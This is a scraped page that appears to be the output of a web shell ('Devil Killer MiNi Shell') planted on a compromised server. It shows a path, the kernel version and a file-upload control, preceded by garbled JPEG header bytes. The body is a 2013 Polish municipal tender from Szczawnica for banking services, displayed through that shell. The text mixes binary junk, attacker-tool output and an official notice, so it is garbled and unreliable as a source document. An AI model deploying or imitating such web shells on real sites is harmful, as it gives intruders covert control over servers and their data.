JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131202/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131202/494996-N-2013.html

<p class="kh_header"><b>Szczawnica: Obsługa bankowa budżetu Miasta i Gminy Szczawnica oraz jej jednostek organizacyjnych</b><br>
<b>Numer ogłoszenia: 494996 - 2013; data zamieszczenia: 02.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Szczawnica , ul. Szalaya 103, 34-460 Szczawnica, woj. małopolskie, tel. 018 2622203, 2622530, faks 018 2622530.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczawnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa bankowa budżetu Miasta i Gminy Szczawnica oraz jej jednostek organizacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie obsługi bankowej budżetu Miasta i Gminy Szczawnica (dalej MiG Szczawnica) oraz  jej jednostek organizacyjnych w latach 2014 - 2017.

Przedmiotowe zamówienie obejmuje następujące jednostki organizacyjne MiG Szczawnica:
Szkoła Podstawowa Nr 1 w Szczawnicy,
Szkoła Podstawowa im. Jana Pawła II w Szlachtowej,
Gimnazjum Publiczne w Szczawnicy,
Miejskie Przedszkole Publiczne w Szczawnicy,
Miejsko Gminny Ośrodek Pomocy Społecznej w Szczawnicy,
Miejski Zakład Gospodarki Komunalnej,
Zespół Ekonomiczno-Administracyjny Oświaty.

Zamawiający zastrzega sobie prawo do zmiany liczby jednostek wskutek ewentualnych zmian organizacyjnych.  W przypadku powołania nowych jednostek organizacyjnych ich obsługa bankowa będzie prowadzona na warunkach zgodnych z niniejszą SIWZ oraz zawartą umową.

Zakres zamówienia obejmuje w szczególności: 
Otwarcie i prowadzenie rachunków bieżących w PLN budżetu  MiG Szczawnica (dla dochodów i wydatków). 
Środki zgromadzone na rachunkach podlegać będą oprocentowaniu nie mniejszemu niż oprocentowanie ustalone na bazie stawki WIBID O/N przemnożonej przez zaoferowany przez Wykonawcę współczynnik.
Otwarcie i prowadzeniu rachunków pomocniczych w PLN dla jednostek organizacyjnych: 
środki zgromadzone na rachunkach pomocniczych podlegać będą oprocentowaniu na takich samych zasadach jak w przypadku rachunku bieżącego, 
Wykonawca zagwarantuje możliwość zmiany liczby obsługiwanych rachunków podmiotów biorących udział w zamówieniu. 
Otwarcie i prowadzenie rachunków związanych z realizacją projektów Unijnych w tym rachunków walutowych. Ilość rachunków zmienna. Zamawiający wskaże rachunki, na których zgromadzone środki nie będą podlegały oprocentowaniu. Wykonawca nie będzie pobierał żadnych prowizji z tytułu prowadzenia wymienionych rachunków, w tym nie będzie pobierał opłat za realizację operacji bankowych.
Wykonawca, zapewni przyjmowanie środków finansowych na lokaty terminowe, o ile podmioty biorące udział w zamówieniu dokonują kwotowania lokaty u Wykonawcy. Odsetki od lokat terminowych księgowane są na rachunek bieżący posiadacza lokat.
Wykonawca zapewni realizację operacji bankowych bez opłat, w tym w szczególności: 
poleceń przelewów krajowych i zagranicznych, 
wpłat i wypłat gotówkowych z rachunków podmiotów biorących udział w zamówieniu w wybranym lub wybranych oddziałach i filiach Wykonawcy niezależnie od tego, w którym oddziale/filii zostaną otwarte i Wykonawca zapewni realizację zleceń stałych oraz poleceń zapłaty, 
realizację transakcji płatniczych z  wykorzystaniem czeków  lub  alternatywnych rozwiązań, 
potwierdzenia stanu sald na rachunkach na każdy dzień roboczy w formie papierowej (wyciągi bankowe).
Kapitalizacja odsetek naliczonych od nadwyżek środków będzie dokonywana miesięcznie. Odsetki od środków na rachunkach będą dopisywane do rachunku bieżącego budżetu MiG Szczawnica z wyłączeniem rachunków jednostki organizacyjnej - Miejski Zakład Gospodarki Komunalnej
Wykonawca, zapewni obsługę kasową, w minimum jednym punkcie kasowym na terenie MiG Szczawnica. W ramach obsługi kasowej Wykonawca zapewni przyjmowanie wpłat na rachunki bankowe MiG Szczawnica bez pobierania opłat od wpłat gotówkowych zarówno od wpłacającego jak i od Zamawiającego. 
Zasady udzielania i funkcjonowania odnawialnego kredytu w rachunku bieżącym budżetu MiG Szczawnica: 
Wykonawca zobowiązany jest udzielić MiG Szczawnica, w każdym roku obowiązywania Umowy, krótkoterminowego  kredytu  odnawialnego  w  rachunku bieżącym  budżetu  Gminy  w  wysokości  wynikającej  z  uchwały  budżetowej  MiG Szczawnica  na  dany  rok  budżetowy,  do  kwoty  maksymalnej 5 000 000 PLN. 
Kredyt w rachunku bieżącym będzie uruchamiany po przekazaniu do Banku stosownej uchwały budżetowej oraz podpisaniu umowy lub  aneksu  do  umowy  o kredyt w rachunku bieżącym. 
Kredyt w rachunku  bieżącym  udzielony  zostanie  bez  prowizji  i  opłat,  jedynym kosztem Zamawiającego będą odsetki od faktycznie wykorzystanego kredytu. 
Zamawiający  przeznaczy  środki  kredytu  w  rachunku  bieżącym  na  pokrycie występującego w ciągu roku przejściowego deficytu budżetu (zgodnie z art. 89 ust. 1 pkt. 1 ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych (Dz. U. 2013 r. poz. 885, z późn. zm.)). 
Oprocentowanie kredytu w rachunku bieżącym będzie opierało się o zmienną stopę procentową  opartą  na  stawce  WIBOR  O/N  plus/minus  stała  w  okresie obowiązywania umowy marża podana z dokładnością do dwóch miejsc po przecinku. 
Odsetki  należne  Wykonawcy  od  kredytu  w  rachunku  bieżącym  naliczane  będą  od kwoty  faktycznie  wykorzystanego  kredytu. Każdy wpływ na  rachunek bieżący budżetu Gminy  będzie  powodował  zmniejszenie  salda  kredytu.  
Do naliczania odsetek założono, że miesiąc ma rzeczywistą liczbę dni a rok 365 dni. 
Odsetkami  od  wykorzystanego  kredytu  w  rachunku  bieżącym  będzie  obciążany rachunek wskazany  przez Zamawiającego z częstotliwością miesięczną w terminie uzgodnionym między Wykonawcą i Zamawiającym. 
Niezależnie  od  codziennej  spłaty  odnawialnego  kredytu w rachunku bieżącym wpływającymi na ten  rachunek środkami dochodów budżetowych, Zamawiający dokona spłaty pozostającej do spłaty kwoty kredytu  nie później niż do dnia 31 grudnia każdego roku lub do dnia upływu terminu wypowiedzenia. 
Zabezpieczeniem roszczeń Wykonawcy z tytułu udzielenia MiG Szczawnica kredytu w rachunku bieżącym  będzie oświadczenie kredytobiorcy o poddaniu się egzekucji w trybie art. 97 ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz. U. z 2002 r. poz. 1376, z późn. zm.). 
Zapewnienie systemu bankowości elektronicznej: 
Wykonawca, dostarczy w ramach realizacji niniejszego zamówienia oprogramowanie typu  bankowość  elektroniczna  we  wskazanych podmiotach biorących  udział w zamówieniu,  a także zapewni nieodpłatne  przekazywanie  i  instalowanie  wersji aktualizujących to oprogramowanie w okresie obowiązywania umowy. 
Wykonawca zapewni w razie konieczności przeszkolenie wskazanych przez Zamawiającego pracowników w  zakresie  obsługi  systemu  bankowości  elektronicznej  oraz  udzieli  wsparcia telefonicznego a także  zapewni świadczenie  usługi  asysty  technicznej i materiały umożliwiające zapoznanie się z działaniem systemu.    
Wykonawca zapewni instalację (uruchomienie) stanowisk bankowości elektronicznej oraz poprawne  działanie  oprogramowania  bankowości  elektronicznej  na stanowiskach  komputerowych  wskazanych  przez  Zamawiającego,  zgodnie  z ustalonym harmonogramem prac. 
Wykonawca  zapewni,  że przelewy/dyspozycje  złożone  do  godziny 15.30 zostaną zrealizowane w tym  samym dniu. 
Wykonawca zapewni alternatywne realizowanie przelewów elektronicznych przygotowanych przez systemy  informatyczne podmiotów biorących udział w zamówieniu w razie awarii sieci komputerowej  wykluczającej  możliwość standardowego wykorzystania kanału elektronicznego wykorzystywanego przez system bankowości elektronicznej (np. możliwość przygotowania nośnika danych i jego fizyczne dostarczenie do dowolnego oddziału/filii banku Wykonawcy, itp.). 
Generowanie i przekazywanie wyciągów bankowych: 
Wykonawca zapewni sporządzanie i przekazywanie Zamawiającemu wyciągów bankowych drogą  elektroniczną  oraz  w  formie  papierowej. 
Wyciągi bankowe będą zawierały wszystkie informacje o płatnościach, jakie zostały umieszczone przez Kontrahentów w opisie płatności. 
Wyciąg  bankowy  musi  zawierać  pełną  nazwę  rachunku,  pełną  nazwę  posiadacza rachunku,  informację  o  przeprowadzonych  wpłatach,  nr  rachunku  beneficjenta, zleceniodawcy i jego pełną nazwę, pełny tytuł płatności, datę wpłaty, informacje na temat otrzymanego kredytu, założonych lokat, kwotach i okresach naliczonych odsetek. 
Format  plików  wyciągów  bankowych  i  zakres  przekazywanych  w  nich  informacji zostanie uzgodniony z Zamawiającym. 
Wymagania techniczno-informatyczne dotyczące  systemu bankowości elektronicznej. 
Wykonawca  ma  obowiązek  posiadać  system  bankowy  dysponujący  następującymi usługami: 
-  bankowość elektroniczna,  
-  polecenie zapłaty,  
zlecenie stałe 
Wykonawca zapewni, aby zainstalowany system bankowości elektronicznej spełniał następujące minimalne wymogi związane z bezpieczeństwem: 
zapewnienie jednoznacznej identyfikacji użytkownika w procesie logowania się do systemu (unikalność identyfikatorów i wymuszanie zmian haseł), 
szyfrowanie  transmisji  danych  algorytmem SSL o  długości  klucza  128  bitów lub  innym  porównywalnym  z zastosowaniem odpowiedniego certyfikatu uwierzytelniającego. Wykonawca oprócz dostarczenia  odpowiedniego  oprogramowania i jego uruchomienia zapewni również wszelkie dodatkowe akcesoria  zapewniające bezpieczeństwo pracy dla użytkowników korzystających z usług aktywnych, a zwłaszcza dla podpisujących przelewy. Jeśli system, jaki Wykonawca zamierza zaoferować, wymaga zastosowania dodatkowych  akcesoriów,  wówczas  Wykonawca  dostarczy  odpowiednią  ilość narzędzi bankowości  elektronicznej  (akcesoria  takie  jak:  token,  karta,  czytnik). 
Wykonawca, zapewni alternatywne realizowanie przelewów elektronicznych przygotowanych  przez  systemy  informatyczne podmiotów biorących udział w zamówieniu w razie awarii sieci komputerowej wykluczającej  możliwość standardowego wykorzystania kanału elektronicznego wykorzystywanego przez system  bankowości  elektronicznej (np. możliwość przygotowania nośnika danych i jego fizyczne dostarczenie do dowolnego oddziału filii banku Wykonawcy,  itp.). 
System  bankowości  elektronicznej  zainstalowany  u Zamawiającego  powinien  umożliwiać  pozyskiwanie  danych z wyciągów prowadzonych przez Wykonawcę rachunków bankowych w postaci elektronicznej w formacie XML. Wykonawca  musi  zapewnić  możliwość bezobsługowego pobierania plików wyciągów bankowych, zgodnie z parametrami ustalonymi przez Zamawiającego. 
Wykonawca,  zagwarantuje  otrzymywanie  z  wystarczającym  wyprzedzeniem (miesięcznym) informacji o planowanych zmianach w organizacji i oprogramowaniu systemu bankowego, szczególnie w zakresie interfejsu. 
System bankowości elektronicznej powinien umożliwiać w szczególności: 
uzyskiwanie  w  czasie  rzeczywistym  wiadomości  o  wszystkich  operacjach  i saldach na rachunku bieżącym budżetu Miasta i pozostałych rachunkach,
przeszukiwanie zbiorów wszystkich operacji na wszystkich ww. rachunkach wg rodzaju operacji, nazwy Kontrahenta, daty, okresu, kwoty i innych możliwych do  wyodrębnienia  kryteriów;  przy  czym  w  okresie  obowiązywania  umowy Wykonawca  zobowiązany  jest  zapewnić  możliwość  przeszukiwania  on-line zbiorów  danych  z  całego  okresu  objętego  obsługą  bankową  oraz prowadzić w tym okresie archiwum; 
składanie poleceń  przelewu w  ramach  dostępnych  środków; 
składanie poleceń przelewu z datą przyszłą, z możliwością ich usuwania, przeglądania, modyfikowania przed wysłaniem do Banku; 
dostęp upoważnionym pracownikom UiM Szczawnica do sald rachunków bankowych podległych jednostek organizacyjnych; 
jednoczesne funkcjonowanie wszystkich stanowisk w tym samym czasie (wymóg systemu wielostanowiskowego); 
informowanie  użytkowników  o  wszystkich  istotnych  sprawach  związanych  z Systemem (np. awarie, aktualizacje, przelewy odrzucone przez Bank).
 Sposób  uiszczania  opłaty  za  świadczenie  usług bankowych zawartych w opisie  przedmiotu zamówienia: 
Wykonawca  wkalkuluje  w  miesięcznej  opłacie  ryczałtowej koszt świadczenia wszystkich usług wymienionych w Opisie przedmiotu zamówienia z wyłączeniem  marży  o której mowa w pkt 5 ppkt 8 lit e siwz. 
Wysokość  miesięcznej  opłaty  ryczałtowej  musi  być  zgodna  ze  złożoną  ofertą  i  nie może zmienić się w okresie trwania Umowy.  
Zamawiający nie przewiduje waloryzacji wynagrodzenia Wykonawcy. 
Wynagrodzenie  ryczałtowe  będzie  obejmowało  wszelkie  czynniki kosztotwórcze. 
Wynagrodzenie Wykonawcy płatne będzie w terminie 14 dni od dnia otrzymania faktury wystawionej przez Wykonawcę po zakończeniu każdego miesiąca.
Zamawiający nie dopuszcza możliwości pobierania żadnych dodatkowych opłat i prowizji bankowych  związanych z udzieleniem i wykorzystaniem kredytu w rachunku bieżącym, za wyjątkiem należnego bankowi oprocentowania na podstawie odrębnych przepisów i przy zastosowaniu stawki marży zadeklarowanej przez Wykonawcę w ofercie cenowej. 
 Zamawiający zastrzega sobie prawo lokowania wolnych środków w innych bankach niż u Wykonawcy wyłonionego w niniejszym postępowaniu przetargowym, zgodnie z art. 264 ust.3 ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych (Dz. U. 2013 r. poz. 885, z późn. zm.). 

Informacje dotyczące posiadanych rachunków bankowych:
średnia ilość przelewów bankowych w miesiącu (dla Mig Szczawnica oraz jej jednostek organizacyjnych): 1504
średnia ilość wypłat gotówkowych w miesiącu (dla Mig Szczawnica oraz jej jednostek organizacyjnych): 92
średnia ilość wpłat gotówkowych w miesiącu (dla Mig Szczawnica oraz jej jednostek organizacyjnych): 84
ilość otwartych rachunków: 36.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.10.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien załączyć do oferty wymagane zezwolenie, o którym mowa w ustawie z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz. U. 02.72.665 z późn. zm.)
Sprawdzenie ww warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawców dokumentów wg zasady spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że wykonał, a w przypadku świadczeń okresowych lub ciągłych, że wykonuje, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, minimum jedną usługę podobną do przedmiotu zamówienia. Za usługę podobną Zamawiający uzna: usługę bankowej obsługi budżetu w okresie minimum 12 miesięcy, jednostki samorządu terytorialnego.
Sprawdzenie ww warunku udziału w postępowaniu odbędzie się na podstawie przedłożonego przez Wykonawcę wykazu wykonanych usług wg zasady spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Oświadczenie złożone na podstawie art. 44 Ustawy, że Wykonawca spełnia warunki określone w art. 22 ust. 1 Ustawy  na druku wg załącznika do siwz.
- Informacja złożona na podstawie art. 36 ust. 4 Ustawy o części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom - oświadczenie zawiera formularz oferty  druk wg załącznika do siwz.
- lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że Wykonawca nie należy do grupy kapitałowej - na druku wg załącznika do siwz.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - oprocentowanie dla kredytu w rachunku bieżącym budżetu MiG Szczawnica - 20</li>
<li>3 - współczynnik dla oprocentowania środków na rachunkach bankowych - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art. 144 Ustawy Zamawiający informuje, że zmiana postanowień w zawartej umowie może nastąpić w następujących przypadkach:
Zmiany danych teleadresowych, osób reprezentujących firmę;
Zmian podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy - na wniosek Wykonawcy w postaci pisemnej zgody Zamawiającego;
Rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy - na wniosek Wykonawcy w postaci pisemnej zgody Zamawiającego.
Nie stanowi zmiany umowy w rozumieniu art. 144 Ustawy zmiana danych związanych 
